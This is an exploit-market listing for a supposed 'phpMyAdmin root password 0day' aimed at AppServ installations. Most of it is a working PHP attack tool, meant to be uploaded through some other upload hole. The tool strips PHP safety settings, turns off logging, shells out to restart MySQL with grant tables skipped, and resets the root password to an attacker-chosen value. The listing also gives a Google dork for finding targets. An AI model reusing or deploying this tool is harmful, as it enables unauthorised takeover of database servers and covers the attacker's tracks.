[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpMyAdmin Root Password 0day

Author
Piaster
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16631
Category
web applications
Date add
08-08-2011
Platform
php

                     .-"""-.
                    / .===. \
                    \/ 6 6 \/
                    ( \___/ )
  ______________ooo__\_____/__________________
 /                                             \
|           __  __  ___                        |
|        /|  _)  _)   /_| _       _ _  _       |
|         | __) __)  /(_|(_|\/.  (_(_)|||      |
|                           /                  |
| $3ll:      G5 (W.DLL) version 1.5            |
| author:    Piaster  (wadelamin)              |
| E-mail:    w.dll@live.com                    |
| copyright: 2010-2011                         |
| Page:http://www.facebook.com/Pias.Piaster    |
 \___________________________ooo______________/
                    |  |  |
                    |_ | _|
                    |  |  |
                    |__|__|
                    /-'P'-\
                   (__/ \__)

# Exploit Title: [phpMyAdmin Root Password]
# Date: [21/6/2011]
# Home: 1337day.com
# Author: [Piaster (wadelamin)]
# phpmyadmin: Software Link: [www.appservnetwork.com ||www.phpmyadmin.net]
# Version: [all phpmyadmin Version]
# Category:: [remote, local]
# Google dork: [inurl:phpMyAdmin ||  The AppServ Open Project - [all Version] for Windows ]
# Tested on: [Windows & unix]
# E-mail: w.dll@live.com
# Page: http://www.facebook.com/Pias.Piaster



File Bug:
//-----------------C:\AppServ\MySQL\scripts/resetpwd.php----------------//

echo "Welcome to AppServ MySQL Root Password Reset Program\n\n";

AppServCMD();

function AppServCMD() {
	define('STDIN',fopen("php://stdin","r"));
	echo " Enter New Password : ";
	$input = trim(fgets(STDIN,256));
	$input = ereg_replace('\"', "\\\"", $input);
	$input = ereg_replace('\'', "\'", $input); 
	echo "\n   Please wait ...................................\n\n";
	exec ("net stop mysql");
	exec ('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');

//You can add a password and then request the file via the browser

	exec ("C:\[AppServ]\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('[root pwd]') where user = 'root';\"");
	exec ("C:\[AppServ]\MySQL\bin\mysqladmin -u root shutdown");
	sleep(3);
	exec ("net start mysql");
}
//--------------------------------END-----------------------------------//



I've modified the file and then request the file from abroad
But first there must be a upload exploit on server so they can upload the tool like any other tool or Shell Script
And then request the file via the browser

There Important Note:
If the Windows server can access phpMyAdmin immediately 
if the file to complete the process this means that 
it is restarted the Mysql and then change the password.




//---------------------------------Exploit the vulnerability tool------------------------//
<?
echo "<style type='text/css'>* { margin: 0; padding: 0; }A {color:#ffffff;text-decoration:none;}A:hover {color:yellow;text-decoration:underline;}body,table { font-family:verdana;font-size:11px;color:white;background-color:#993333; }.table5 { font-family:verdana;font-size:11px;color:white;background-color:black; }table { width:30%; }table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }input{ color:#000000;border:2px solid #666666; }.barheader,.mainpaneltable,td { border:1px solid #333333; }.input{ border:2px  gold;margin:0; }input[type='submit'] { border:1px solid black; } input[type='text'] { padding:5px;}input[type='button'] { background-color:gold; }.select,option,input[type='button']:hover { background-color:red; }input[type='submit'] { background-color:orange }.select,option,input[type='submit']:hover { background-color:red; }input,input[type='text']:hover { background-color:#AF2C07; }textarea,.mainpanel input,select,option { background-color:orange; }</style>";echo "<head><title>PiAsTeR VS phpMyAdmin</title><div style=\"background: orange;\"><p align=\"center\"><font size=\"2\" <h1><font color = red><b>PiAsTeR</font> VS <font color = red>phpMyAdmin</font></h1></b></p><hr color=\"black\"</div></div><center><BR>";$f = '<a href="http://www.facebook.com/Pias.Piaster" target="_blank">Facebook</a>';

@set_time_limit(0);
@ini_restore("safe_mode");
@ini_restore("allow_url_fopen");
@ini_restore("open_basedir");
@ini_restore("disable_functions");
@ini_restore("safe_mode_exec_dir");
@ini_restore("safe_mode_include_dir");

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);

$win = strtolower(substr(PHP_OS,0,3)) == "win";
if(function_exists('exec')){$pias = exec;}
elseif(function_exists('shell_exec')){$pias = shell_exec;}
elseif(function_exists('system')) {$pias = system ;}
elseif(function_exists('passthru')) { $pias = passthru ;}

if($win) {
	define('STDIN',fopen("php://stdin","r"));
	$input = trim(fgets(STDIN,256));
	$input = ereg_replace('\"', "\\\"", $input);
	$input = ereg_replace('\'', "\'", $input); 
	echo "\n   Please wait ...................................\n\nGoodluck ... <br>USER: root & PASSWORD: piaster";
	$pias("net stop mysql");
	$pias('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
	$pias("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
	$pias("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
	sleep(3);
	$pias("net start mysql");} 

if(!$win) {
echo '<br><br><br><form action="#" method="post"><p align="center"><table><tr><td>user<input name="dbu" size="20" value = ' . $_REQUEST['dbu'] . ' ><td>password<input name="dbp" size="20" value = ' . $_REQUEST['dbp'] . ' ><td>host<input name="dbh" size="20" value = ' . $_REQUEST['dbh'] . '></tr></table><input type="submit" value="GO" name = "pias" /> </p></form></td></tr><td><tr>';

if(isset($_REQUEST['pias'])){
    
$dbu = $_REQUEST['dbu'];
$dbp = $_REQUEST['dbp'];
$dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
$conn = @mysql_connect($dbh, $dbu, $dbp);
$select = @mysql_select_db('mysql', $conn);
if (!$select) {
echo @mysql_error();}
$t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
$go1 = @mysql_query( $t1 , $conn);
if($go1){echo '<center><br>Goodluck ... Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster</center>';}
else echo 'database mysql not acsses or not found ty agin';}}

echo '<br><br>By Piaster :: w.dll@live.com :: '. $f ;

?> 
//---------------------------------Exploit the vulnerability tool end--------------------//



#  0day.today [2024-12-24]  #